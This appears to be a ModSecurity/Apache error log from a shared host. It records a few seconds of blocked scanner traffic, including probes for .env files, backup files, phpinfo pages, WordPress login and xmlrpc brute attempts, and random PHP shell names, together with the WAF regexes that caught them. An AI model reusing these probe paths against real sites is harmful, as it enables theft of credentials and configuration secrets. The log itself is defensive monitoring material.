[Tue May 26 15:48:06.564314 2026] [security2:error] [pid 747840:tid 748021] [client 207.241.173.116:37250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production~"] [unique_id "ahVzXom6MwAuYuZKxvnpFwAAAT0"]
[Tue May 26 15:48:06.564390 2026] [security2:error] [pid 747840:tid 748007] [client 207.241.173.116:37262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in.jiyani.in"] [uri "/.env.production.swp"] [unique_id "ahVzXom6MwAuYuZKxvnpBwAAAS8"]
[Tue May 26 15:48:06.627257 2026] [security2:error] [pid 747840:tid 747978] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzXom6MwAuYuZKxvno_QAAARI"]
[Tue May 26 15:48:06.785470 2026] [security2:error] [pid 745492:tid 745692] [client 223.123.35.44:36222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzXomEQglTmoWcfxJ2xgAAAMg"]
[Tue May 26 15:48:06.785651 2026] [security2:error] [pid 745492:tid 745692] [client 223.123.35.44:36222] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzXomEQglTmoWcfxJ2xgAAAMg"]
[Tue May 26 15:48:07.328276 2026] [security2:error] [pid 747840:tid 748071] [client 4.193.189.92:2295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wp-blog-header.php"] [unique_id "ahVzX4m6MwAuYuZKxvnpIwAAAW8"]
[Tue May 26 15:48:08.139998 2026] [core:error] [pid 747840:tid 748072] [client 4.193.189.92:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:48:08.140024 2026] [core:error] [pid 747840:tid 748072] [client 4.193.189.92:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:48:08.583202 2026] [security2:error] [pid 747840:tid 747979] [client 114.119.146.111:28407] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/canik-tp9sa-mod-2-parts.html"] [unique_id "ahVzYIm6MwAuYuZKxvnpQgAAARM"], referer: https://whitesun.in/1hfq/canik-tp9sa-mod-2-parts.html
[Tue May 26 15:48:08.742489 2026] [security2:error] [pid 747840:tid 748022] [client 62.60.130.233:51201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amslca.com.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVzYIm6MwAuYuZKxvnpRAAAAT4"], referer: https://www.linkedin.com/
[Tue May 26 15:48:08.755501 2026] [security2:error] [pid 747840:tid 747987] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzYIm6MwAuYuZKxvnpOgAAARs"]
[Tue May 26 15:48:08.910836 2026] [security2:error] [pid 747840:tid 748018] [client 4.193.189.92:4689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ws.php"] [unique_id "ahVzYIm6MwAuYuZKxvnpSAAAATo"]
[Tue May 26 15:48:09.079145 2026] [security2:error] [pid 747840:tid 747991] [client 62.60.130.233:51277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amslca.com.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVzYYm6MwAuYuZKxvnpSgAAAR8"], referer: https://www.reddit.com/
[Tue May 26 15:48:09.523669 2026] [security2:error] [pid 745492:tid 745675] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzYYmEQglTmoWcfxJ25wAAALc"], referer: https://www.anujtradingco.com/
[Tue May 26 15:48:09.650154 2026] [security2:error] [pid 747840:tid 747981] [client 103.153.130.62:64402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzYYm6MwAuYuZKxvnpTwAAARU"]
[Tue May 26 15:48:09.650304 2026] [security2:error] [pid 747840:tid 747981] [client 103.153.130.62:64402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzYYm6MwAuYuZKxvnpTwAAARU"]
[Tue May 26 15:48:09.693360 2026] [security2:error] [pid 745492:tid 745720] [client 4.193.189.92:9456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/wsa.php"] [unique_id "ahVzYYmEQglTmoWcfxJ27gAAAOQ"]
[Tue May 26 15:48:10.286281 2026] [security2:error] [pid 745492:tid 745703] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzYomEQglTmoWcfxJ2-wAAANM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285277&moderation-hash=4e0d83967d61716d2f3f85439cb6c2c2
[Tue May 26 15:48:10.454104 2026] [security2:error] [pid 745492:tid 745694] [client 4.193.189.92:6254] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/w.php"] [unique_id "ahVzYomEQglTmoWcfxJ2_wAAAMo"]
[Tue May 26 15:48:10.952736 2026] [security2:error] [pid 745492:tid 745626] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzYomEQglTmoWcfxJ3AgAAAIY"]
[Tue May 26 15:48:11.227033 2026] [security2:error] [pid 747840:tid 748014] [client 4.193.189.92:6827] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/x.php"] [unique_id "ahVzY4m6MwAuYuZKxvnpXQAAATY"]
[Tue May 26 15:48:11.989879 2026] [security2:error] [pid 745492:tid 745746] [client 4.193.189.92:8037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/xx.php"] [unique_id "ahVzY4mEQglTmoWcfxJ3JgAAAP4"]
[Tue May 26 15:48:12.442571 2026] [security2:error] [pid 747840:tid 747986] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzZIm6MwAuYuZKxvnphQAAARo"], referer: https://anujtradingco.com
[Tue May 26 15:48:12.968562 2026] [security2:error] [pid 745492:tid 745682] [client 4.193.189.92:2244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/xmlrpc.php"] [unique_id "ahVzZImEQglTmoWcfxJ3OwAAAL4"]
[Tue May 26 15:48:13.021315 2026] [security2:error] [pid 747840:tid 748059] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzZIm6MwAuYuZKxvnphwAAAWM"]
[Tue May 26 15:48:13.748385 2026] [security2:error] [pid 745492:tid 745706] [client 4.193.189.92:8052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/y.php"] [unique_id "ahVzZYmEQglTmoWcfxJ3TgAAANY"]
[Tue May 26 15:48:14.738241 2026] [security2:error] [pid 747840:tid 748047] [client 45.148.10.159:55666] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mail.strapptech.com"] [uri "/.svn/entries"] [unique_id "ahVzZom6MwAuYuZKxvnpqwAAAVc"]
[Tue May 26 15:48:15.109046 2026] [security2:error] [pid 747840:tid 748078] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzZom6MwAuYuZKxvnpqgAAAXY"]
[Tue May 26 15:48:15.532242 2026] [security2:error] [pid 745492:tid 745669] [client 114.119.128.56:24425] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVzZ4mEQglTmoWcfxJ3ZwAAALE"], referer: http://glorodavionics.com/beta/index.php?route=product/product&path=72_25_110&product_id=103
[Tue May 26 15:48:15.900151 2026] [security2:error] [pid 747840:tid 748027] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.strapptech.com"] [uri "/index.php"] [unique_id "ahVzZ4m6MwAuYuZKxvnpvQAAAUM"]
[Tue May 26 15:48:15.900938 2026] [security2:error] [pid 747840:tid 747979] [client 45.148.10.159:33804] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "mail.strapptech.com"] [uri "/"] [unique_id "ahVzZ4m6MwAuYuZKxvnpuwAAARM"]
[Tue May 26 15:48:16.328202 2026] [security2:error] [pid 745492:tid 745703] [client 143.110.243.118:56468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/we1y8.php"] [unique_id "ahVzaImEQglTmoWcfxJ3dAAAANM"]
[Tue May 26 15:48:17.373848 2026] [security2:error] [pid 747840:tid 748061] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzaIm6MwAuYuZKxvnp6gAAAWU"]
[Tue May 26 15:48:18.243732 2026] [security2:error] [pid 747840:tid 748013] [client 45.148.10.159:33828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/form.php"] [unique_id "ahVzaom6MwAuYuZKxvnqBwAAATU"]
[Tue May 26 15:48:18.245639 2026] [security2:error] [pid 747840:tid 747981] [client 62.60.130.233:59600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahVzaom6MwAuYuZKxvnqDwAAARU"], referer: https://www.facebook.com/
[Tue May 26 15:48:18.586788 2026] [security2:error] [pid 747840:tid 748043] [client 62.60.130.233:51149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-login.php"] [unique_id "ahVzaom6MwAuYuZKxvnqFAAAAVM"], referer: https://duckduckgo.com/
[Tue May 26 15:48:18.669717 2026] [security2:error] [pid 747840:tid 747977] [client 45.148.10.159:33840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/.env"] [unique_id "ahVzaom6MwAuYuZKxvnqFwAAARE"]
[Tue May 26 15:48:18.760725 2026] [security2:error] [pid 745492:tid 745632] [client 105.79.66.36:61333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.66.79.105.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahVzaomEQglTmoWcfxJ3jAAAAIw"]
[Tue May 26 15:48:18.760889 2026] [security2:error] [pid 745492:tid 745632] [client 105.79.66.36:61333] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "moes-art.com"] [uri "/xmlrpc.php"] [unique_id "ahVzaomEQglTmoWcfxJ3jAAAAIw"]
[Tue May 26 15:48:18.957828 2026] [security2:error] [pid 747840:tid 748035] [client 45.148.10.159:33840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/phpinfo.php"] [unique_id "ahVzaom6MwAuYuZKxvnqJwAAAUs"]
[Tue May 26 15:48:19.275329 2026] [security2:error] [pid 747840:tid 747987] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzaom6MwAuYuZKxvnqJQAAARs"]
[Tue May 26 15:48:19.369010 2026] [security2:error] [pid 745492:tid 745727] [client 45.148.10.159:35944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/portal/.env"] [unique_id "ahVza4mEQglTmoWcfxJ3mgAAAOs"]
[Tue May 26 15:48:19.499825 2026] [security2:error] [pid 745492:tid 745638] [client 45.148.10.159:35944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/env/.env"] [unique_id "ahVza4mEQglTmoWcfxJ3nAAAAJI"]
[Tue May 26 15:48:19.972004 2026] [security2:error] [pid 747840:tid 748000] [client 143.110.243.118:54026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/jdimzmtaas.php"] [unique_id "ahVza4m6MwAuYuZKxvnqPAAAASg"]
[Tue May 26 15:48:20.042013 2026] [security2:error] [pid 747840:tid 748061] [client 103.153.130.62:64696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzbIm6MwAuYuZKxvnqPwAAAWU"]
[Tue May 26 15:48:20.042125 2026] [security2:error] [pid 747840:tid 748061] [client 103.153.130.62:64696] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzbIm6MwAuYuZKxvnqPwAAAWU"]
[Tue May 26 15:48:20.485493 2026] [security2:error] [pid 747840:tid 748010] [client 45.148.10.159:35952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/api/.env"] [unique_id "ahVzbIm6MwAuYuZKxvnqRgAAATI"]
[Tue May 26 15:48:20.613186 2026] [security2:error] [pid 747840:tid 748047] [client 45.148.10.159:35952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/app/.env"] [unique_id "ahVzbIm6MwAuYuZKxvnqSAAAAVc"]
[Tue May 26 15:48:20.746448 2026] [security2:error] [pid 747840:tid 748050] [client 45.148.10.159:35952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/dev/.env"] [unique_id "ahVzbIm6MwAuYuZKxvnqTgAAAVo"]
[Tue May 26 15:48:20.877855 2026] [security2:error] [pid 747840:tid 747971] [client 45.148.10.159:35952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/new/.env"] [unique_id "ahVzbIm6MwAuYuZKxvnqTwAAAQs"]
[Tue May 26 15:48:21.094926 2026] [security2:error] [pid 745492:tid 745699] [client 136.116.219.71:63839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.219.116.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahVzbImEQglTmoWcfxJ3uAAAAM8"]
[Tue May 26 15:48:21.095065 2026] [security2:error] [pid 745492:tid 745699] [client 136.116.219.71:63839] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shardagalaxy.com"] [uri "/xmlrpc.php"] [unique_id "ahVzbImEQglTmoWcfxJ3uAAAAM8"]
[Tue May 26 15:48:21.516123 2026] [security2:error] [pid 745492:tid 745661] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzbYmEQglTmoWcfxJ3uwAAAKk"]
[Tue May 26 15:48:21.707013 2026] [security2:error] [pid 747840:tid 748066] [client 45.148.10.159:35952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/_phpinfo.php"] [unique_id "ahVzbYm6MwAuYuZKxvnqZQAAAWo"]
[Tue May 26 15:48:22.313671 2026] [security2:error] [pid 747840:tid 748012] [client 45.148.10.159:35968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/_profiler/phpinfo/info.php"] [unique_id "ahVzbom6MwAuYuZKxvnqbQAAATQ"]
[Tue May 26 15:48:22.885358 2026] [security2:error] [pid 745492:tid 745751] [client 45.148.10.159:35972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/_profiler/phpinfo/phpinfo.php"] [unique_id "ahVzbomEQglTmoWcfxJ33gAAAQM"]
